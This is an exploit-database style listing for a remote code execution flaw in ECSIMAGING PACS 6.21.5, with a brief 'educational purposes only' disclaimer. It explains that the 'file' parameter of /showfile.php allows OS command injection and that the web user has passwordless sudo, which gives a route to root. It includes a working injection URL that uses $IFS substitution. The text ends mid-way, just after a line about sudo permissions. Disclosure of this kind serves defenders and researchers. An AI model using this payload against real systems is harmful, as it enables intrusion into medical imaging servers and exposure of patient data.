Ecsimaging pacs 6.21.5 remote code execution Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2021-01-07 | Type : webapps | Platform : php
This exploit / vulnerability Ecsimaging pacs 6.21.5 remote code execution is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: ECSIMAGING PACS 6.21.5 - Remote code execution
# Date: 06/01/2021
# Exploit Author: shoxxdj
# Vendor Homepage:
# Version: 6.21.5 and bellow ( tested on 6.21.5,6.21.3 )
# Tested on: Linux

ECSIMAGING PACS Application in 6.21.5 and bellow suffers from a OS Injection vulnerability.
The parameter "file" on the webpage /showfile.php can be exploited with simple OS injection to gain root access.
www-data user has sudo NOPASSWD access :


Command injection can be realized with the $IFS tricks : <url>/showfile.php?file=;ls$IFS-la$IFS/

User www-data may run the following commands on this host: